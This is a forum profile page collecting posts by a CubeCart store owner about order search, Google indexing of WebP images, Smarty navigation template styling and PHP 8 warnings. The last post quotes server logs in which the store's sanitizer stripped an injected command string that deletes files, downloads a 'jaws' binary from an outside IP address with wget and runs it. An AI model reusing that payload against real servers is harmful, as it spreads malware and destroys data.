Jump to content

Claudia

Member
  • Posts

    242
  • Joined

  • Last visited

  • Days Won

    2

Posts posted by Claudia

  1. I was creating an order and it won't let me add the product.  I put in "anti" in the search and all my other Antique wood style oil warmers ....  and all come up (plus other products) but this one.  I have checked the product listing in admin along with the database in cPanel.

    Any ideas why?

    Thanks

    PS I created an order earlier today and all went well

  2. Checking the above today and found this in orange.  Anything for me to do?  I haven't changed anything. Thanks

    PS  I got unknown server error when I tried to upload a screen shot of this.

     

    cambarga_cubecart.CubeCart_404_log 1571 InnoDB utf8_unicode_ci 336 kB -
    CubeCart_404_log.uri has a key type UNIQUE KEY but expecting KEY.

     

  3. I was checking my Google Webmaster today and received this (among many) under crawled - currently not indexed. 

    https://www.cambargainstore.com/images/source/iron-flat-sad-swirl-pattern-handle/01-antique-all-cast-iron-sad-iron-with-swirl-pattern-handle-main.webp

     

    I searched sad iron with swirl pattern handle in Google and this came up

     

    Antique All Cast Iron Sad Iron with Swirl Pattern Handle

    109.123.79https://109.123.79.170 › antique-all-cast-iron-sad-iron-w...

    FOR SALE Antique all cast iron sad iron with swirl or diagonal pattern handle. Measures 6L x 4W x 4-1/2H and weighs 5 lbs. 4.3 oz. Full of antique charm.

     

    This is the exact wording of my listing except for the IP adress.

    I looked up 109.123.79.170 and it came up with the host name o-2g0.com in Great Britain.

    I checked the blacklist status and it wasn't on the list.

     

    How did someone add an IP address to my listing like that?

     

    Thanks for all your help

  4. I have had a very sudden drop in my page indexing with Google. A lot have to do with the webp extension on my images.  I had Google test one of the pages and this is what it shows. (in part). Is this normal, how it should look?  I don't use the Cubecart sitemap.  I have XML-Sitemaps including the one for images

     

    https://www.cambargainstore.com/images/source/bottle-coke-empty-minnesota-minneapolis/04-minneapolis-minnesota-vintage-empty-patd-christmas-coke-bottle-left.webp

     

    RIFF����WEBPVP8 ����P2


    *


     


    >m6I$"&"1���

     

    gm~WL‑�������ސ4����v|8���yCg-�����y`+^^?

    ����_O<~��­Ԇb/OW��u��h//~~6ܷd}t��zy^����?�������ߟ���w��T[���‑3���_���G���


    ��#k |W���#���~�����T��?��������� {
    `
    KE���AרkX#W\���П~Au ?
    ��Ak76ˬ��B_ǩ|v^/Q��C[1]ō%x
    ���&]jCk9˛a՘
    Di+o~C:+/tc*|}��2'x��ϛj<v���,E+)&��{l|6��)<��S1jF[1]8E$v2T~P[1[���T>���~&��G��O3��"�������+̜`@��d*���9?��pX��;}

     

  5. I just noticed this.  I add the alt / title to all images of products I have added since that feature was offered.  When I hover over a thumbnail and it enlarges no matter what the image is it shows the title of the main image (on the hovered thumb). 

     

    Also why don't my thumbs lineup with the main image? - have the row padding. 

     https://www.cambargainstore.com/electric-warmer-plugin-yellow-ovals

    My code is highly modified from Foundation.  If you need my code let me know.

    Thanks in advance

    Claudia

    Here's a link

    Sorry about link above

  6. {if isset($BRANCH.children)}
        <ul class="vnb-sub-cbd">
        <li itemprop="name" class="vnb-sub-title">{$BRANCH.name}</li>
            {$BRANCH.children}
        </ul>
        {/if}

    There is no <li> for {$BRANCH.children}

     

    There is no ccs rule for has-sub-cbd . It's in the script

    $('.vnb-sub-cbd').hide();
        $('.has-sub-cbd').hover(function(){
            $(this).children('.vnb-sub-cbd').fadeToggle(200);
        });

    Would something like this work for individual child styling?  I know it's not right

    <li {if isset($BRANCH.children)}class="has-sub-cbd"{/if}>
        <a href="{$BRANCH.url}" title="{$BRANCH.name}"{if $VNB_CBD_BRANCH.cat_id == '40'class="pad-bottom"
    {else} class="vm-box-link-cbd">{$BRANCH.name}  {if isset($BRANCH.children)}<svg class="icon  icon-x1 has-sub-arrow-cbd"><use xlink:href="#icon-angle-right"></use></svg>{/if}</a>
        {if isset($BRANCH.children)}
        <ul class="vnb-sub-cbd">
        <li itemprop="name" class="vnb-sub-title">{$BRANCH.name}</li>
            {$BRANCH.children}
        </ul>
        {/if}
    </li>

     

  7. I see what you mean about the icon-sprites.svg" file.  Can a person add to this file?

    .vnb-sub-cbd a.vm-box-link-cbd { } worked  but what if I wanted to style one sub differently than the others. Like cat ID 40

    Promise I'll try not to ask anything else

    Can I move the sub box up a little so it's in the middle of the parent instead at the bottom

  8. I may want to change the > to a side triangle. I got this error when I tried to open the icon-sprites.svg" file.

    This page contains the following errors:

    error on line 1 at column 1: Document is empty

    Below is a rendering of the page up to the first error.

     

    Any idea about this:  {$BRANCH.children}  How can I get it it's own styling  Do I put it in a <div> or <span>  <div class=??> {$BRANCH.children} </div>

  9. Kinda, been working on it, again, all day .... still some stuff I can't figure out. For instance: where do I find the icons (>) How can I hide the children from small display. May have more questions

    My new tree code:

    <li {if isset($BRANCH.children)}class="has-sub-cbd"{/if}>
        <a href="{$BRANCH.url}" title="{$BRANCH.name}" class="vm-box-link-cbd">{$BRANCH.name}  {if isset($BRANCH.children)}<svg class="icon  icon-x1 has-sub-arrow-cbd"><use xlink:href="#icon-angle-right"></use></svg>{/if}</a>
        {if isset($BRANCH.children)}
        <ul class="vnb-sub-cbd">
        <li itemprop="name" class="vnb-sub-title">{$BRANCH.name}</li>
            {$BRANCH.children}
        </ul>
        {/if}
    </li>

    icon-x1  I created this

    {$BRANCH.children}  How can I get it it's own styling

     

  10. I have tried for days to do this but can’t figure out how.  I have my vertical menu working but I don’t know how to put the >> (or sideways triangle) on the main category when it has children.  Also, if I want my children styled different than the parent how do I do that. Here is my code. Thanks for any help!

     

    Skin/element.navigation_tree

     

    <li class="has-sub-cbd">

       <a class="vm-box-link-cbd" href="{$BRANCH.url}" title="{$BRANCH.name}">{$BRANCH.name}</a>

     

       {if isset($BRANCH.children)}

       <ul class="vnb-sub-cbd">

         <!-- <li itemprop="name" class="vnb-sub-title-cbd">{$BRANCH.name}</li> -->

          {$BRANCH.children}

       </ul>

       {/if}

    </li>

     

    I commented out  <!-- <li itemprop="name" class="vnb-sub-title-cbd">{$BRANCH.name}</li> --> because I don’t want the main category name showing with the children.

     

     

    Skin/box.navigation

    {if $CATEGORIES}

    {$CATEGORIES}

    {else}

    <div id="vm-container">

      <ul itemscope itemtype="http://www.schema.org/SiteNavigationElement" class="vm-top">

              <li itemprop="name"><a class="vm-box-link-cbd" itemprop="url" href="{$ROOT_PATH}" title="{$LANG.common.home}"><svg class="icon"><use xlink:href="#icon-home"></use></svg>&nbsp;&nbsp;Home</a></li>

                <li>      <a href="/listed-only-on-ebay" title="Listed only on eBay" class="vm-ebay-txt">Listed only on eBay</a></li>

                <li>      <a href="/listed-only-on-etsy" title="Listed only on Etsy" class="vm-etsy-txt">Listed only on Etsy</a></li>       

                            {$NAVIGATION_TREE} 

               </ul>

          </div>

      {/if}

  11. I made the changes as suggested in GITHub PHP 8 Warning #3397 - $basket_array['weight'] ?? 0.  Now I get these warnings.

    I know some are not related.

    [04-Oct-2023 15:32:50 America/Louisville] PHP Warning:  Security Warning: Illegal array key "cd_/tmp;rm_-rf_*;wget_94_158_247_123/jaws;sh_/tmp/jaws" was detected and was removed. in /home/xxxxxxx/public_html/classes/sanitize.class.php on line 114

    [04-Oct-2023 17:22:29 America/Louisville] PHP Deprecated:  ucwords(): Passing null to parameter #1 ($string) of type string is deprecated in /home/xxxxxxx/public_html/cache/skin/c6ff5523b42eda7c097b9ded7c507de36a425832_0.file.orders.index.php.php on line 673

    [04-Oct-2023 17:30:45 America/Louisville] PHP Warning:  Undefined array key "productOptions" in /home/xxxxxxx/public_html/admin_OE2vfW/sources/orders.index.inc.php on line 91

    [04-Oct-2023 17:57:09 America/Louisville] PHP Warning:  Undefined array key "productOptions" in /home/xxxxxxx/public_html/admin_OE2vfW/sources/orders.index.inc.php on line 116

    [04-Oct-2023 17:57:09 America/Louisville] PHP Warning:  Undefined array key "custom" in /home/xxxxxxx/public_html/admin_OE2vfW/sources/orders.index.inc.php on line 124

    [04-Oct-2023 18:28:51 America/Louisville] PHP Warning:  Undefined array key "cart_order_id" in /home/xxxxxxx/public_html/classes/cubecart.class.php on line 2778

    [05-Oct-2023 03:50:09 UTC] PHP Fatal error:  Uncaught mysqli_sql_exception: No such file or directory in /home/xxxxxxx/public_html/classes/db/mysqli.class.php:37

    Stack trace:

    #0 /home/xxxxxxx/public_html/classes/db/mysqli.class.php(37): mysqli->__construct()

    #1 /home/xxxxxxx/public_html/classes/db/mysqli.class.php(64): Database->__construct()

    #2 /home/xxxxxxx/public_html/controllers/controller.index.inc.php(22): Database::getInstance()

    #3 /home/xxxxxxx/public_html/index.php(27): include('/home/cambarga/...')

    #4 {main}

      thrown in /home/xxxxxxx/public_html/classes/db/mysqli.class.php on line 37

    [04-Oct-2023 23:50:46 America/Louisville] PHP Warning:  Invalid Security Token in /home/xxxxxxx/public_html/classes/sanitize.class.php on line 155

    [04-Oct-2023 23:50:46 America/Louisville] PHP Warning:  Undefined global variable $_GET in /home/xxxxxxx/public_html/includes/functions.inc.php on line 218

    [05-Oct-2023 05:47:24 America/Louisville] PHP Warning:  Security Warning: Illegal array key "cd_/tmp;rm_-rf_*;wget_121_62_21_23/jaws;sh_/tmp/jaws" was detected and was removed. in /home/xxxxxxx/public_html/classes/sanitize.class.php on line 114

×
×
  • Create New...